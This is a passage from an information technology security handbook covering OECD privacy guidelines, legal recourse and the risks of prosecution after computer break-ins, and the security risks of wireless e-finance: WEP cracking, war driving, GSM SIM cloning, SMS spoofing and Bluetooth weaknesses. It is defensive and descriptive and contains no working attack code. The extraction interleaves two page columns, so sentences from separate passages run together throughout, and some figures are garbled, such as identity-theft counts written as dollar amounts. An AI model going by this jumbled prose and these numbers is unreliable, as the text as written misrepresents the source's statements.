OECD Guidelines P Personal data should be protected by reasonable security ART In 1980, the Organization for Economic Development safeguards against such risks as loss or unauthorized and Cooperation (OECD) adopted an expanded set of access, destruction, use, modification, or disclosure of privacy guidelines. These guidelines were designed, data. THREE in part, to harmonize the growing number of privacy regulations throughout the industrialized world. The Openness Principle guidelines were also specifically designed to deal with the growing problem of transborder data flows--the There should be a general policy of openness about movement of personal information from one coun-try, developments, practices, and policies with respect to where that data might be highly protected, to another personal data. Means should be readily available of country that might have lesser protections. The OECD establishing the existence and nature of personal data, Guidelines on the Protection of Privacy and Transborder and the main purposes of their use, as well as the identity Flows of Personal Data consist of eight principles: and usual residence of the data controller. Collection Limitation Principle Individual Participation Principle There should be limits to the collection of personal An individual should have the right: data, and any such data should be obtained by lawful · To obtain from a data controller, or --otherwise, and fair means and, where appropriate, with the knowledge confirmation of whether or not the data controller has or consent of the data subject. data relating to him; · To have communicated to him, data relating to him: Data Quality Principle o Within a reasonable time; o At a charge, if any, that is not excessive; Personal data should be relevant to the purposes for o In a reasonable manner; and which it is to be used, and, to the extent necessary for o In a form that is readily intelligible to him; those purposes, should be accurate, complete, and kept · To be given reasons if a request made specified as up to date. above is denied, and to be able to challenge such denial; and 124 INFORMATION SECURITY AND GOVERNMENT POLICIES · To challenge data relating to him and, if the challenge is successful to have the data erased, rectified, completed, or amended. Accountability Principle A data controller should be accountable for complying with measures that give effect to the principles stated above. The OECD Guidelines do not have the force of law, but are instead used as guidelines for each OECD member country when passing its own laws. See Part 3, Chapter 11 for a simple checklist on data protection measures that may be taken if you gather information about potential customers on your web site. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 125 CHAPTER 9. In some cases, you may have no choice; you may be COMPUTER CRIME required to pursue legal action. For example: At a Glance ·If you want to file a claim against your insurance policy to receive money for damages resulting from a break-in, you may be required by your insurance We hope that you will never have to act on the company to pursue criminal or civil actions against information in this Chapter. You may have studied the perpetrators. this Handbook diligently and taken every reasonable ·If you are involved with classified data processing, step toward protecting your system­yet someone has you may be required by government regulations to still abused it. Perhaps an ex-employee has broken in report and investigate suspicious activity. through an old account and has deleted some records. ·If you are aware of criminal activity and you do not Perhaps someone from outside continues to try to break report it, you may be criminally liable as an accessory. into your system despite warnings that they should This is especially true if your computer is being used stop. What recourse do you have through the courts? for the illegal activity. Furthermore, what are some of the particular dangers ·If your computer is being used for certain forms of you may face from the legal system during the normal unlawful or inappropriate activity and you do not operation of your computer system? What happens if take definitive action, you may be named as a you are the target of legal action? This chapter defendant in a civil lawsuit seeking punitive attempts to illuminate some of these issues. The damages. material we present should be viewed as general advice, P ·If you are an executive of a public company and and not as legal opinion: for that, you should contact ART decide not to investigate and prosecute illegal activ- good legal counsel and have them advise you. ity, shareholders of your corporation can bring suit against you. Your Legal Options After a Break-In THREE ·If you are an executive of a private company, though you do not have shareholders, it may be possible for If you suffer a break-in or criminal damage to your suppliers, partners, or customers to bring suit system, you may have a variety of recourses under the against you, depending on the laws on computer your legal system. This chapter cannot advise you on crime in your country. the many subtle aspects of the law. There are many differences in legal systems and laws from country to If you are working in a company and believe that your country, as well as different laws that apply to computer system is at especially high risk for attack, you should systems used for different purposes. Laws outside the probably speak with your organization's legal counsel as United States vary considerably from jurisdiction to part of your security incident preplanning before you jurisdiction; we won't attempt to explain anything have an incident. Organizations have different policies beyond the U.S. system.63 However, we should note that regarding when law enforcement should or should not the global reach of the Internet may bring laws to bear be involved. By doing your homework, you increase the that have their origin outside the U.S. chances that these policies will actually be followed when they are needed. Discuss your specific situation with a competent lawyer before pursuing any legal recourse. Because there are To provide some starting points for discussion, this section difficulties and dangers associated with legal approaches, gives an overview of a few issues you might want to you should be sure that you want to pursue this course consider. of action before you go ahead. 63A more extensive, although dated, discussion of legal issues in the United States can be found in Computer Crime: A Crimefighter's Handbook (O'Reilly), and we suggest you start there if you need more explanation than we provide in this chapter. The book is out of print, but used copies are available. 126 INFORMATION SECURITY AND GOVERNMENT POLICIES Filing a Criminal Complaint Investigations can place you in an uncomfortable and possibly dangerous position. If unknown parties are In the United States, you are free to contact law continuing to break into your system by remote means, enforcement personnel any time you believe that some- law enforcement authorities may ask you to leave your one has broken a criminal statute. You start the process system open, thus allowing the investigators to trace by making a formal complaint to a law enforcement the connection and gather evidence for an arrest. agency. A prosecutor may be asked to decide if the Unfortunately, if you leave your system open after allegations should be investigated and what charges discovering that it is being misused, and the perpetra- should be filed, if any. tor uses your system to break into or damage another system elsewhere, you may be the target of a third- In some cases--perhaps a majority of them--criminal party lawsuit. Cooperating with law enforcement agents investigation will not help your situation. If the perpe- is not a sufficient shield from such liability. Investigate trators have left little trace of their activity and the the potential ramifications before putting yourself at activity is not likely to recur, or if the perpetrators are risk in this way. entering your system through a computer in a foreign country, you probably will not be able to trace or arrest Contacting the Relevant Authorities the individuals involved. Many experienced computer intruders will leave little tracing evidence behind.64 Depending on the criminal and legal systems in your country, there may be specific processes for contacting If you do file a complaint, there is no guarantee local or state authorities in the case of computer crime. that the agency will actually conduct a criminal The following are general suggestions, but it will be investigation. The prosecutor involved (federal, state, most effective if you follow the customs appropriate to or local) decides which, if any, laws have been broken, your region. the seriousness of the crime, the availability of trained ·You might approach local or state authorities first, investigators, and the probability of a conviction. if possible. If your local law enforcement personnel Remember that the criminal justice system is over- believe that the crime is more appropriately investi- loaded; new investigations are started only for severe gated by the Federal government, they will suggest violations of the law or for cases that warrant special that you contact them. Unfortunately, some local treatment. A case in which $200,000 worth of data is law enforcement agencies may be reluctant to seek destroyed is more likely to be investigated than a case outside help or to bring in Federal agents. This may in which someone is repeatedly scanning your home keep your particular case from being investigated computer through your cable modem. properly. ·Local authorities may be more responsive because If an investigation is conducted, you may be involved you are not as likely to be competing with a large with the investigators or you may be completely isolated number of other cases (as frequently occurs in the from them. You may even be given erroneous informa- United States at the federal level). Local authorities tion--that is, you may be told that no investigation may be more likely to be interested in your problem, is taking place, even though a full-scale investigation no matter how small the problem may be. is in the works. Many investigations are conducted on ·At the same time, although some local authorities a "need to know" basis, occasionally using classified are tremendously well-versed in computers and com- techniques and informants. If you are told that there puter crime, even in the U.S., local authorities gen- is no investigation and in fact there is one, the person erally have less expertise than state and federal who gives you this information may be deliberately authorities and may be reluctant to take on high- misinforming you, or they themselves may simply not tech investigations. Many federal agencies have have the "need to know." expertise that can be brought in quickly to help deal with a problem. 64Although few computer intruders are as clever as they believe themselves to be. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 127 ·In the U.S., state authorities may be more interested systems and media. This problem becomes more severe than federal authorities in investigating and prose- if you are dealing with agents who need to seek expert- cuting juveniles. If you know that you are being ise outside their local offices to examine the material. attacked by a juvenile who is in your state, you may Be sure to keep track of downtime during an investiga- be better off dealing with local authorities. In some tion as it may be included as part of the damages dur- cases, you may find that it is better to bypass the ing prosecution and any subsequent civil suit--suits legal system entirely and speak with the juvenile's that may be waged against either your attacker or, in parents or teachers (or have an attorney or imposing some cases, against the law enforcement agency itself. police officer speak to them). Your site's backups can be extremely valuable in an Hazards of Criminal Prosecution investigation. You might even make use of your disaster- recovery plan and use a standby or spare site while your There are many potential problems in dealing with law regular system is being examined. enforcement agencies, not the least of which is their experience with computers, networking, and criminal- Heavy-handed or inept investigative efforts may also related investigations. Computer-illiterate agents may place you in an uncomfortable position with respect to sometimes seek your assistance to try to understand the the computer community. Many computer users harbor subtleties of the case. Other times, they may ignore negative attitudes toward law enforcement officers-- your advice--perhaps to hide their own ignorance, and these feelings can easily be redirected toward you if you often to the detriment of the case and the reputation of are responsible for bringing the "outsiders" in. Such atti- P the law enforcement community. Note that there is tudes can place you in a worse light than you deserve, ART always the possibility that the "victim" in a crime is and hinder cooperation not only with the current investi- also involved in criminal activity. In general, it is poor gation but with other professional activities. Furthermore, practice for an investigator to accept advice from the they may make you a target for electronic attack or other THREE victim without some level of suspicion, and this is no forms of abuse after the investigation concludes. different in the case of cybercrime. These attitudes are unfortunate, because there are some If you or your personnel are asked to assist in the very good investigators, and careful investigation and execution of a search warrant to help identify material prosecution may be needed to stop malicious or persistent to be searched, be sure that the court order directs such intruders. We can report that this situation seems to "expert" involvement. Otherwise, you might find your- have gotten better in recent years, so this is less of a self complicating the case by appearing to be an concern than it was a decade ago. As time goes on, and overzealous victim. You may benefit by recommending as more people realize the damage done by intruders, an impartial third party to assist the law enforcement even those without malicious intent, we expect to see agents. the antipathy towards law enforcement fade even more. The attitude and behavior of the law enforcement We do encourage you to carefully consider the decision officers can sometimes cause major problems. Your to involve law enforcement agencies with any security equipment might be seized as evidence or held for an problem pertaining to your system. In most cases, we unreasonable length of time for examination--even if suggest that you carefully consider whether you want to you are the victim of the crime. If you are the victim involve the criminal justice system at all unless a real and are reporting the case, the authorities will usually loss has occurred, or unless you are unable to control make every attempt to coordinate their examinations the situation on your own. In some instances, the pub- with you, to cause you the least amount of inconven- licity involved in a case may be more harmful than the ience. However, if the perpetrators are your own loss you have sustained. employees, or if regulated information is involved (bank, military, etc.), you might have no control over Once you decide to involve law enforcement, avoid the manner or duration of the examination of your publicizing this fact. In some cases the involvement of 128 INFORMATION SECURITY AND GOVERNMENT POLICIES law enforcement will act as a deterrent to the attackers, Playing It Safe . . . but in other cases it may make you the subject of more attacks. Also be aware that the problem you spot may Here is a summary of additional recommendations for be part of a much larger problem that is ongoing or avoiding possible abuse of your computer. Most of these beginning to develop. You may be risking further dam- are simply good policy whether or not you anticipate age to your systems and the systems of others if you break-ins: decide to ignore the situation. ·Put copyright and/or proprietary ownership notices We wish to stress the positive. Law enforcement agencies in your source code and data files. Do so at the top are generally aware of the need to improve how they of each and every file. If you express a copyright, investigate computer crime cases, and they are working to consider filing for the registered copyright--this develop in-service training, forensic analysis facilities, and version can enhance your chances of prosecution other tools to help them conduct effective investigations. and recovery of damages. In many jurisdictions (especially in high-tech areas of the ·Be certain that your users are notified about what country), investigators and prosecutors have gained con- they can and cannot do. siderable experience and have worked to convey that ·If it is consistent with your policy, make all users of information to their peers. The result is a significant your system aware of what you may monitor. This improvement in law enforcement effectiveness over the includes e-mail, keystrokes, and files. Without such last few years, with many successful investigations and notice, monitoring an intruder or a user overstep- prosecutions. You should very definitely think about the ping bounds could itself be a violation of wiretap or positive aspects of reporting a computer crime--not only privacy laws! for yourself, but for the community as a whole. Successful ·Keep good backups in a safe location. If comparisons prosecutions may help prevent further misuse of your against backups are necessary as evidence, you need system and of others' systems. to be able to testify as to who had access to the media involved. Having tapes in a public area will The Responsibility to Report Crime probably prevent them from being used as evidence. ·If something happens that you view as suspicious or Finally, keep in mind that criminal investigation and that may lead to involvement of law enforcement prosecution can only occur if you report the crime. If personnel, start a diary. Note your observations and you fail to report the crime, there is no chance of actions, and note the times. Run paper copies of log apprehension. Not only does that not help your situa- files or traces and include those in your diary. A tion, it leaves the perpetrators free to harm someone written record of events such as these may prove else. Remember that the little you see may only be valuable during the investigation and prosecution. one part of a huge set of computer crimes and acts of Note the time and context of each and every contact vandalism. Without investigation, it isn't possible to with law enforcement agents as well. tell if what you have experienced is an isolated incident ·Try to define in writing the authorization of each or part of a bigger whole. employee and user of your system. Include in the description the items to which each person has A subtler problem results from a failure to report serious legitimate access (and the items each person cannot computer crimes: it leads others to believe that there access). Have a mechanism in place so each person are few such crimes being committed. As a result, insuf- is apprised of this description and can understand ficient emphasis is placed on budgets and training for his or her limits. new law enforcement agents in this area; little effort is ·Tell your employees explicitly that they must return made to enhance the existing laws; and little public all materials, including manuals and source code, attention is focused on the problem. The consequence when requested or when their employment terminates. is that the computing milieu becomes incrementally ·If something has happened that you believe requires more dangerous for all of us. law enforcement investigation, do not allow your Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 129 personnel to conduct their own investigation. Doing the search warrant. In the recent past, a few federal too much on your own may prevent some evidence investigators and law enforcement personnel in some from being used or may otherwise cloud the investi- states developed a reputation for heavy-handed and gation. You may also aggravate law enforcement excessively broad searches. In part, this was because personnel with what they might perceive to be of inexperience with computer crime, and it has been interference in their investigation. getting better with time. ·Make your employees sign an employment agreement that delineates their responsibilities with respect to Playing It Safe . . . sensitive information, machine usage, electronic mail use, and any other aspect of computer operation that · Be prepared with a network and/or keystroke might later arise. Make sure the policy is explicit and monitoring system that can monitor and record all fair, and that all employees are aware of it and have information that is sent or received by your signed the agreement. State clearly that all access computer. If you suspect a break-in, start monitoring and privileges terminate when employment does, and and recording immediately: do not wait to be given that subsequent access without permission will be instructions by law enforcement: in some cases law prosecuted. enforcement agencies cannot give you such instructions without first obtaining a court order, Criminal Hazards for Businesses since, by acting upon their instructions, you would be acting as an extension of the law. If you operate an Internet service provider or web site, · Make contingency plans with your lawyer and P or have networked computers on your premises, you insurance company for actions to be taken in the ART may be at risk for criminal prosecution yourself if those event of a break-in or other crime, the related machines are misused. This section is designed to investigation, and any subsequent events. acquaint you with some of the risks. · Identify law enforcement personnel who are THREE qualified to investigate problems that you may have If law enforcement officials believe that your computer ahead of time. Introduce yourself and your concerns system has been used by an employee to break into to them in advance of a problem. Having at least a other computer systems, to transmit or store controlled nodding acquaintance will help if you later information (trade secrets, child pornography, etc.), or encounter a problem that requires you to call upon to otherwise participate in some computer crime, you law enforcement for help. may find your computers impounded by a search warrant · Consider joining societies or organizations that or writ of seizure. If you can document that your stress ongoing security awareness and training and employee has had limited access to your systems, and if work to enhance your expertise in these areas. you present that information during the search, it may help limit the scope of the confiscation. However, you may still be in a position in which some of your equipment is confiscated as part of a legal search. Depending on accepted practices in your legal system, local police or federal authorities may present a judge with a petition to grant a search warrant if they believe there is evidence to be found concerning a violation of a law. If the petition is in order, the judge may grant 130 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 10. other key providers (e.g., hosting companies or ISPs) MOBILE RISK MANAGEMENT: can better ensure that problems do not arise. Hence, E-FINANCE IN THE WIRELESS this chapter attempts to both illustrate how and why ENVIRONMENT electronic security can become a concern and how to 65 mitigate this risk via many actions that may not entail At a Glance substantial additional costs for providers of financial services. Many of the recommended actions, noted in this chapter related to layered security in the case of This chapter documents the risks to electronic security wireless applications to provide financial services, repre- via identity theft, hacking, etc. that wireless technologies sent what can be considered to be best practice in the may present in the context of delivery of financial services. electronic security industry today. This comes with the Although the extent of security measures to be taken is important proviso that the rapid changes in technology not independent of the size of the transactions contem- make this a very difficult area in which to prescribe plated, this chapter points out a variety of ways that static guidelines for system administrators within financial interactions between technologies create points of vul- service providers. nerability for security of financial transactions when wireless technology is employed. This chapter lays out a The chapter is divided into the following sections. variety of critical actions and measures that system Section I introduces the reader to the widespread administrators (particularly, in banks) can take in order usage of e-finance and wireless technologies throughout to mitigate these risks to the largest possible extent the world. SectionII illustrates the risks that are and often without great increases in costs of security. inherent to the wireless revolution. Section III depicts The actions suggested in this chapter for mitigating the vulnerabilities associated with WLANs and the such risks reflect a concerted effort to address what appropriate risk mitigating procedures necessary to many in the electronic security industry consider secure them. Section IV addresses the evolution of to be best practice in regard to electronic security GSM networks and the vulnerabilities that are inherent arrangements in the case of use of wireless to them. Section V details the appropriate methods of technologies in the delivery of financial services. managing the risk found in GSM networks. Section VI Wireless Technology in Emerging Markets illustrates the best practices for management of risk in the delivery of payment services. Section VII offers a conclusion with a perspective into the future (3G). The rapid growth of wireless technology in many emerging The purpose of this document is to enunciate a markets and the increasing use of such technologies in set of security and risk management guidelines for coordination with the Internet or on a free standing banks and payment services. It aims to provide a basis to provide financial services in emerging markets framework for security risk assessment applicable will demand a very careful look at issues related to to the wireless environment. electronic security. Nowhere is this issue more prevalent in emerging markets than in the area of wireless tech- I. Overview of e-finance 66 nology given the extensive spread of cellular technology to many emerging markets. As more and more countries Electronic financial services, whether delivered attempt to leapfrog via use of such technologies in the online or through remote mechanisms, have spread context of providing financial services, it is essential to rapidly. Countries and consumers are increasingly recognize the potential electronic security breeches that getting connected. These new technologies not can occur via use of wireless technologies and how market only allow countries to leapfrog in connectivity, participants and systems administrators at banks or 65See the World Bank paper by Tom Kellermann "Mobile Risk Management: e-Finance for the Wireless Environment (2002)," via link at: http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Publications 66For more detailed analysis of the e-security dilemma, refer to "E-security Risk Mitigation for Financial Transactions" authored by Glaessner T., T. Kellermann, and V. McNevin, 2002. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 131 they also open new channels for delivering ing transactions with better connectivity in emerging e-financial services.67 Since the mid-90s investment markets could rise even further to 20 percent by 2005. in banking technology has focused upon online68 bank- There could be more than 6 trillion dollars of business- ing and brokerage services to increase convenience. to-business (B2B) transactions online by 2005.71 E-finance has lowered the costs of providing financial services. The Internet eliminates many processing Another trend is moving in tandem with this growth steps and labor costs, while avoiding the fixed costs in e-finance: the widespread usage of wireless commu- of branch development and maintenance. A typical nications technologies in the developing and developed customer transaction through a branch or phone call countries of the world. This relatively new medium is costs about $1 in the U.S., but that transaction costs quickly becoming the medium of choice for e-commerce just $0.02 online. The lower costs for providing finan- and e-finance. The migration of business from paper- cial services have also allowed greater access to finan- based systems of commerce to Internet-based platforms cial services. Internet-based services are sometimes as is profound. As services migrate from these "land lines" popular in emerging markets as industrialized ones. For to more accessible wireless technologies, the subsequent example, online banking is nearly as widespread in negative externalities (e.g., war driving) of this Brazil as in the United States. Due to the apparent lack phenomenon are beginning to proliferate as well. of fixed line infrastructure in many developing nations, most financial institutions have implemented wireless Mobile devices are considered to be the developing e-financial platforms to expand access to their services. world's technological springboard. In 1990, there were Concurrent with these realities, four new technology just 11 million72 mobile phone subscribers worldwide. P related industry trends have occurred: outsourcing, By 1999, the proliferation of wireless technologies had ART open architecture, integrated strategies, and new exploded to over 500 million. Now that number has methods of e-payment.69 almost doubled. One developing country typifies the possibilities of leapfrogging73 using mobile devices. With THREE E-finance is comprised of four primary channels. These a fixed-line network, obliterated after more than 20 are: electronic funds transfers, "EFT"; electronic data years of civil war, Cambodia became connected via the interchange, "EDI"; electronic benefits transfers, "EBT"; widespread adoption of wireless technology. Within and electronic trade confirmations, "ETC". EFT is the one-year wireless penetration of mobile subscribers oldest form of electronic money transmittal, beginning outnumbered fixed telephones. Cambodia with one of in the early 1960s. There is a huge amount of EFT the world's lowest per capita incomes surpasses 31 worldwide among and between banks. The U.S. Treasury countries in overall telephone penetration, including estimates the figure to be $2 trillion/day or $700 tril- countries with much higher incomes. Rather than lion/year. A significant part of banking EFT via the spending the vast amount of resources and time to SWIFT network is actually carried out via international establish fixed-line infrastructure to facilitate telecom- satellite. Currently, half of the world's 200 countries munications, countries around the world are substituting obtain Internet and "Wide Area Intranet" connection via hard-wired infrastructure for the relatively cheap and satellite links. Although these are typically the nations easy to develop cellular towers. There are, however, with the most developed economies, this involves a sig- certain risks related to security associated with nificant amount of digital traffic and E- finance opera- such leapfrogging. tions. This is a major concern in terms of vulnerability.70 By 2005, the share of online banking could rise from Continued economic integration and the new delivery 8.5 percent to 50 percent in industrial countries, and channels for financial services, such as the wireless from 1 to 10 percent in emerging markets. Online bank- protocols, will increase opportunities for banks to deliver 67Glaessner, T., S. Claessens, and D. Klingebiel. 2001. " E-finance in Emerging Markets: Is Leapfrogging Possible?" 68Goldman Sachs and Boston Consulting Group Statistics, 2000. 69Gilbride, Edward. Emerging Bank Technology and the Implications for E-crime Presentation. September 3, 2001. 70Dr. Joseph N. Pelton, "Satellite Communications 2001: The Transition to Mass-Consumer Markets, Technologies, and Systems". 132 INFORMATION SECURITY AND GOVERNMENT POLICIES financial services to remote areas. However, these for e-financial crime. In 2001, more than one fourth opportunities are not limited to the formal economy. The (27 percent) of banking and financial databases were underground (criminal) economy of the world have adopt- breached.75 Eastern European organized hacker rings ed technology as well. Integration of financial services have penetrated hundreds of banks worldwide. Hacking across the wireless medium has created an opportunity has become a business model for organized crime. The for identity theft, fund transfer, and extortion. FBI's computer crimes division notes that presently many banks are paying off extortion demands for fear of II. E-finance on Wireless Networks: reputation risk and the potential loss of their The Danger customer base to competitors. The Egghead hacking incident of last year is a prime example of extortion. With the benefits of new technology also come risks. Hackers penetrated a database containing 10,000 credit Technology facilitates new methods of fraud and theft. card numbers and then demanded that the company pay Impersonation, remote access, high quality graphics and them a large sum of cash, in order to protect those printing, and new multipurpose tools and platforms cre- numbers from being posted in a chat room. In reality, ate this cornucopia of crime online. With the spread of on Christmas Eve, every one of those compromised cards dial-up-ATMs that provide customer access to money in was charged a minimal sum. Thus the threat goes underdeveloped locations, criminals can manipulate the beyond financial and reputational loss. One forecast wireless connection between the dial-up-ATM and the suggests that reported incidents of identity theft in the parent bank, thus compromising all transactions that United States will more than triple, from $700,00076 last move in and out of the dial-up-ATM. The art of online year to $1.7 million in 2005, and the costs to financial penetrations (e.g., hacking) was once a very skilled and institutions will increase 30 percent each year, to more sophisticated trade. The information age has cultivated than $8 billion in 2005.77 a breeding ground for underground hacker websites that now supply dubious individuals with the multi- faceted Trends in cyber-crime reveal significant growth. tools necessary to break into financial platforms. Attacks on servers doubled in 2001 compared to 2000, Websites like www.astalavista.box.sk and www.attri- and nearly 90 percent of companies surveyed have been tion.org supply complex malicious code and viruses that infected with worms or viruses despite having anti- allow novice users to penetrate banking systems. The virus software installed, according to the Information Internet Data Corporation (IDC) recently reported that Security Industry Survey.78 The 2001 CSI/FBI Computer over 57 percent74 of all hack attacks last year were tar- Crime and Security Survey stated that over $377 million geted in the financial sector. in total annual losses occurred due to hacking in the United States last year.79 The traditional risks of yester-year have been reshaped. Historically, frauds were paper based or people based. In The issue of non-reporting is at the heart of why this the electronic environment there are new opportunities serious issue has not been dealt with appropriately 71Jupiter Communications, 2001. 72Box 1 of "E-Finance in Emerging Markets: Is Leapfrogging Possible?" Claessens. S, T. Glaessner, D. Klingebiel, 2001. 73Leapfrogging is defined as the phenomenon when developing countries build a hi-tech wireless communications infrastructure rather than under taking the massive project of creating a fixed-line infrastructure within their borders. 74www.idc.com. 75Evans Data Corp. Survey 76This figure represents a yearly trend within the United States of America only. 77Published in a 2001 report by Celent Communications. The projections were made using FTC data. 78http://www.infosecuritymag.com/articles/october01/images/survey.pdf. 79James Savage, Special Agent in Charge, Secret Service, Financial Crimes division, stated that: " This figure represents critical infrastructure losses that the business community is willing to admit having suffered." He suggested that this figure may represent only a minuscule fraction of the actual damage incurred to the U.S. business community. October 3, 2001. 80Cornelius Tate, Special Agent, CERT depicted the lack of reporting:" I think the dollar loss is actually higher than what is being reported. In my experience, I see companies not reporting or downplaying their compromises or losses. I think, a lot of the reduced reporting comes down to the company attempting to reduce the "shock" to the stockholders and the public. I think, you will see noticeable increase in the dollar amount from year to year (although the number of respondents remain consistent) because companies are more aware of the fact that everyone is susceptible to being a victim, and to be a victim has become acceptable and does not equate to a loss of `public confidence.'" (October 4, 2001). Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 133 worldwide.80 Financial entities and corporations are fearful 1. Insertion Attacks ­ The intruder attempts to insert of reporting their losses due to the public image ramifi- traffic into your network, typically through an cations and thus remain complacent to the presence of unsecured mobile access point. the threat. If it becomes known that a financial provider has fallen victim to a computer crime or fraud, there is 2. Session Hijacking--Also known as the man in the assumption that their customers will lose confidence the middle attack, it is possible to hijack a wireless in them and their ability to protect information. It's session based upon the reality that the phone essential for financial service providers to maintain control authenticates itself to the base station but not of their systems mitigate compromises to their security. vice versa. It is possible to emulate the base The wireless medium, which is proliferating worldwide, is station and thus hijack a phones session. not a secure medium. The haste by which countries have adopted wireless platforms for the purposes of e-finance 3. Jamming ­ This is a DoS (Denial of Service) attack has created a significant quandary. where the attacker tries to flood the radio frequency (RF) spectrum of your wireless network by broad- III. Wireless Local Area Networks (WLANs) casting packets at the same frequency as your network. Wireless networks are currently available in three basic formats: wireless LANs (WLANs) using the 802.11b 4. Encryption Attacks ­ The IEEE 802.11b wireless protocol; CDMA/TDMA/GSM (cellular and PCS) networks network standard uses an WEP (Wired Equivalent used for wireless phones and personal digital assistants Privacy) encryption method. This standard uses weak P (PDAs); and high powered microwave systems used by encryption and Initialization Vectors (IVs) and has ART telephone companies for long haul, line-of-sight com- been cracked successfully many times. munications. While all of these are common throughout the world, they all suffer from the same basic security 5. Traffic Interception and Monitoring (War Driving) THREE flaw; they use radio frequency (RF) technology to transmit ­ Wireless packets using the 802.11b standard have their information. This can result in their transmissions an approximate transmission distance of 300 feet. being compromised. This means that anyone with the proper standard equipment can receive that signal if they are in Wireless networks (WLANS) have seen explosive growth transmission range. Equipment to further extend that in their deployment. With cost savings at an all time range is easily available, so the area of interception high and with the simplicity of installation, WLANs have can be quite large and hard to secure properly. been deployed rapidly, especially by financial institu- tions. Wireless networks were supposed to do what tra- 6. Mobile Node to Mobile Node ­ Most mobile nodes ditional Ethernet LANs do without cables. Convenience (laptops, PDA's) are able to communicate directly for the customer is paramount in the proliferation of with each other if file sharing or other TCP/IP wireless. Currently wireless technology is built around services are running. This means that any mobile the 802.11b IEEE standard in the United States and the node can transfer a malicious file or program GSM standard in Europe. When designing a wireless net- rapidly throughout your network. work, there are important security concerns one should keep in mind. 7. Configuration Issues ­ Any wireless device, service, or application that is not correctly configured before There are seven basic categories of wireless network installation and use can leave an entire network at security risks:81 risk. Most wireless devices and applications are 81Chris Bateman of CERT Analysis Center contributed the seven wireless vulnerabilities. 134 INFORMATION SECURITY AND GOVERNMENT POLICIES pre-configured to accept any request for services or markets as highlighted above. Each of these security access. This means any passing mobile client can breaches and associate risks can be minimized or request and receive telnet sessions or ftp. negated with the proper use of security policy and practices, network design, system security applications, 8. Brute Force Attacks ­ Most wireless access points and the correct configuration of security controls. use a shared password or key for all devices on that The last chapter of Part 3 includes information on network. This makes wireless access points vulnerable how to secure WLANs. to brute force dictionary attacks against passwords. IV. The European Cellular Standard: GSM War driving GSM is the world's most widely deployed and fastest Industrial espionage and white-collar crime has reached growing digital cellular standard. Currently, there are new heights with the advance of new technologies. nearly 600 million GSM subscribers worldwide, more War dialing, the hacking practice of phoning up every than two thirds of the world's digital mobile population.82 extension of a corporate phone network until the And this figure is increasing by four new users per second. number associated with the firm's modem bank is hit GSM covers every continent, being the technology of upon, has been replaced by war driving. War driving choice for 400 operators in over 170 countries. But involves motoring targeted financial institutions and this is only the beginning of the wireless revolution. corporate headquarters with a laptop fitted with The industry predicts that there will be over 1.4 billion a WLAN cardand trying to record network traffic (sniffing). GSM customers by the end of 2005. GSM phones have a According to Dave Thomas, the Chief Investigator of the small smart card inside them, which holds the identity FBI Computer Crimes Division, war driving is a wide- of the cell phone. This small smart card is called spread phenomenon that jeopardizes the security of all Subscriber Identification Module (SIM). The SIM must institutions and corporations who implement WLANs. keep the identity inside secret and uses cryptography to protect it. The SIM card may be seen as a strength and When testing and deploying WLANs, a network a weakness of the GSM technology. administrator may find that their laptops can only connect to the access points within a certain distance GSM Vulnerabilities and therefore assume that the signals don't travel beyond this point. This is a flawed assumption. In fact, The SIM Card Vulnerability these signals may travel for a several thousand meters In both European and American GSM systems, the given there is nothing in the way to deflect or interrupt network access method is the same. Removable smart the signal. The reason for this misconception is that the cards in the phone (SIM cards) are used to store phone small antennae in the laptops cannot detect the weaker numbers, account information, and additional software signals. However, using external antennae, the range such as wireless web browsers. The data on the cards can be vastly extended. The wireless segment is usually are encrypted, but the COMP128 algorithm that protects omni directional so a potential adversary need not gain the information on the card has been compromised, physical access to the segment to sniff (or record) the thus making these cards susceptible to duplication. War packet traffic. As a result WLANs are susceptible to driving is not a substantial issue for cellular subscribers message interception, alteration, and jamming. utilizing GSM. Regardless of frequency, cellular signals can easily be jammed. There is a widely known method The above considerations raise the issue of how to forrecovering the key for an encrypted GSM conversation better secure wireless networks. This will be as critical in less than a second using a PC with 128 MB of RAM as securing fixed- line Internet systems in the emerging and 73 GB of hard drive space. 82The North American GSM system currently operates at 1900mhz in conjunction with digital PCS services. The data services associated with GSM are Short Message Service (SMS), Analog Cellular Switched Data (CSD), and General Packet Radio Service (GPRS).40 Most of European Cellular Carriers use a form of GSM, in either 900mhz or 1800mhz.41 Europeans also have the option of using High Speed Circuit Switched Data (HSCSD), which combines several channels into a single channel capable of 38.4 KBPS. GPRS is also available in most countries. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 135 The security of GSM phone technology is circumspect. It fake site. Many GPRS enabled phones also support is possible to clone GSM SIM cards. The hack attack is Bluetooth. Each Bluetooth device has a unique address, possible because critical algorithms are flawed making allowing users to have some trust in the person at the it possible to dump the contents of the SIM cards and other end of the transmission. Once this ID is associat- then emulate them using a PC.43 This latest problem ed with a person, by tracking the unscrambled address could render GSM phone conversations totally insecure. sent with each message, individuals can be traced and For a bank there are other issues. For example, a remote their activities easily logged. For Bluetooth devices to teller machine could be tricked into communicating communicate, an initialization process uses a PIN for with a fake mobile tower because it cannot reach a real authentication. While some devices will allow you to one. This would allow the perpetrator to remotely control punch in an ID number, you can also store a PIN in the the transmissions of funds via the teller machine. device's memory or on a hard disk. This is highly prob- lematic if the physical security of the device cannot be The SMS Vulnerability45 guaranteed. Also most PINs use four digits and half the GSM offers Short Message Services (SMS). SMS is used time they are"0000." in GSM systems for many reasons, such as voice-mail notification, updating the subscriber's SIM, sending The security of Bluetooth is based on keeping the short text messages, and communicating with e-mail encryption key a secret shared only between partici- gateways. Whereas these services are convenient, they pants in the network. But imagine you and I are having pose an additional risk to the security of the network. a conversation using our Bluetooth cell phones. To keep SMS is a store and forward service that is inherently the conversation secure, I use your secret key to P insecure because the messages that are transmitted in encrypt his/her information. Later that day, a friend ART clear text and subsequently stored in clear text at the calls you again and you use your key. Knowing your key, SMS center before being forwarded to their intended I can use a faked device address, determine the encryp- recipients. SMS also suffers from latency problems. Time tion, and listen to your phone conversations. I could THREE critical transactions should not rely on this channel. also masquerade as you or your friend. Bluetooth only There is freely available software that can spoof SMS authenticates devices, not users. messages, send SMS bombs both to handsets and SMS gateways (used to communicate between devices both WAP 